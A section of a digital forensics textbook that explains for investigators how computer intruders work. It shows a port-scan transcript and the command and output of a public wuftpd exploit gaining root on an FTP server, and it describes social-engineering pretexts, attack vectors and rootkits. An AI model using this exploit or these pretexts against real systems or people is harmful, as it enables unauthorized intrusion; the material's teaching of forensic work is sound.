19.1 How Computer Intruders Operate


19.1 How Computer Intruders Operate

The most straightforward way to break into a computer is to steal or guess a password. However, if this is not a viable option, an intruder can usually gather enough information about a system to gain access to it. The most basic way to gather information about a system is to use a port scanner as shown here:

    % probe_tcp_ports 192.168.52.2    Host 192.168.52.2, Port 7 ("echo" service) connection ... open.    Host 192.168.52.2, Port 9 ("discard" service) connection ... open.    Host 192.168.52.2, Port 13 ("daytime" service) connection ... open.    Host 192.168.52.2, Port 19 ("chargen" service) connection ... open.    Host 192.168.52.2, Port 21 ("ftp" service) connection ... open.    Host 192.168.52.2, Port 23 ("telnet" service) connection ... open.    Host 192.168.52.2, Port 25 ("smtp" service) connection ... open.    Host 192.168.52.2, Port 53 ("domain" service) connection ... open.    Host 192.168.52.2, Port 69 connection ... open.    Host 192.168.52.2, Port 79 ("finger" service) connection ... open.    Host 199.168.52.2, Port 110 ("pop" service) connection ... open. 

This basic TCP port scanner shows that, in addition to running an e-mail server on port 25, this computer has a number of other servers, including an FTP server on port 21 for people to transfer files to and from the computer, a finger server on port 79 that can give out information about individuals with accounts on the machine, and a POP server for users to check their e-mail remotely. The operating system and server version can often be inferred from this type of port scan, or using a more advanced port scanner like nmap. Knowing the operating system and services that are running on a computer is often all that is required - because certain services on certain operating systems are known to be vulnerable. For instance, the following shows an exploit that is freely available on the Internet being used to gain unauthorized access to an FTP server:

    % wuftpd-exploit -t 192.168.7.25 -s 0    Target: 192.168.7.25 (ftp/<shellcode>):RedHat 6.2 with wuftpd 2.6.0(1)    Return Address: 0x08075844, AddrRetAddr. 0xbfffb028, Shellcode: 152    loggin into system..    USER ftp    331 Guest login ok, send your complete e-mail address as password.    PASS <shellcode>    230-Next time please use your e-mail address as your password    230 Guest login ok, access restrictions apply.    STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]    STEP 3 : Checking if we can reach our return address by format string    STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)    STEP 5 : Sending code.. this will take about 10 seconds.    Press ^\ to leave shell    Linux ftp-server.corpX.com 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 200 0 i586    unknown    uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)    w      8:54am  up 3 days,  12:21,   0 users, load average:   0.12,    0.09,  0.03    USER     TTY        FROM             LOGIN@      IDLE   JCPU    PCPU   WHAT    last    ftp      ftpd7718      intruder.isp.com  Wed   Sep 20 08:52 still   logged in    ftp      ftpd7291      helpsrv.smut.com  Tue   Sep 19 15:13 still   logged in    reboot   system boot   2.2.14-5.0        Sat   Sep 16 20:33         (3 + 12:21)    ftp      ftpd1120      203.235.121.105   Sun   Sep 10 04:08 - down  (1+21:32)    ftp      ftpd833       mail2.txinc.com   Sat   Sep 9  21:39 - down  (2+04:02)    reboot   system boot   2.2.14-5.0        Sat   Sep 9  12:21         (2+13:20)    wtmp begins Thu Sep    7 17:59:03 2000 

When intruders cannot access a system through known security holes, they use less technical methods to gain access. Intruders sometimes even dig through garbage for useful information. Intruders also try to get information using social engineering and reverse social engineering. Social engineering refers to any attempt to contact legitimate users of the target system and trick them into giving out information that can be used by the intruder to break into the system. For example, calling someone and pretending to be a new employee who is having trouble getting started can result in useful information like computer names, operating systems, and even some information about employee accounts. Alternatively, pretending to be a computer technician who is trying to fix a problem can also lead to useful information. There are many different ways to do this, including calling people claiming to be looking into a problem or going into the organization to look around. Some people will even make the mistake of giving out their passwords.

Reverse social engineering is any attempt to have someone in the target organization contact you for assistance. Instead of contacting them, they contact you. For example, sending a memo with a "new" technical support e-mail can result in a flood of information. The advantage of reverse social engineering is that the user is less likely to be suspicious and report the incident. When people seek help from an intruder who resolves their problems, they are less likely to be suspicious and are unlikely to have any reason to report the incident to anyone.

Table 19.1 summarizes the various methods of approach/attack. The categories are not mutually exclusive - intruders may employ several of these attack vectors to achieve their goals.

Table 19.1: Different attack methods. (Dunne, Long, Casey 2000)

ATTACK VECTOR NAME

DESCRIPTION

Authentication bypass

Gaining access while avoiding standard authentication

Authentication failure

Taking advantage of authentication systems which "fail open"

Buffer overflows

Exploiting stack memory overwriting in networked server programs

Password cracking

Brute-force, reverse-engineering, and "dictionary" based methods used to discover account passwords

Password sniffing

Capturing account passwords via a network "tap"

Session hijacking

Piggybacking on authorized user connections from the Internet into internal hosts and networks

Social engineering

Impersonation of authorized personnel to gain access or network passwords

Spoofing

Having a computer masquerade as a different "trusted" computer to gain access

Trojan horses

Malicious programs such as BackOrifice can provide "back doors" (unauthorized avenues for access) into hosts from the Internet

Many of the attack methods in Table 19.1 were discussed in earlier chapters such as buffer overflows in Chapter 15, session hijacking in Chapter 16, and IP spoofing in Chapter 17.

After intruders gain access to a computer, they may be able to compromise the administrator account (known as "root" on UNIX systems) thus getting unrestricted access to the entire system. In fact, certain security holes allow computer intruders to break into a computer and get root access in one step. With unlimited access to the system, it is possible for an offender to modify any information on the computer, thus removing traces of an intrusion. Intruders may change the system clock, delete log files, and replace system components. There are specific computer programs, called rootkits, which automate the process of hiding a break-in enabling a low skilled offender to exhibit higher skilled behavior. For example, the Rootkit[2] project is developing such a program for Windows machines. More sophisticated rootkits such as Knark, Sebek, and Suckit on Linux are emerging, making intrusion investigations even more challenging. Increasingly, criminals are using strong encryption on UNIX systems such as encrypted RAM disks, Blowfish encryption in IRC eggdrop bots, encrypted executables using Teso Burneye (Phrack 58, 2001), and using other "anti-forensic" tools to make digital evidence examinations more difficult (Phrack 59, 2002).

Once an intruder has gained access to one computer on a network, it may be possible to gather additional information about a network and obtain passwords to other systems using a sniffer.

[2]http://www.rootkit.com




Digital Evidence and Computer Crime
Digital Evidence and Computer Crime, Second Edition
ISBN: 0121631044
EAN: 2147483647
Year: 2003
Pages: 279

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net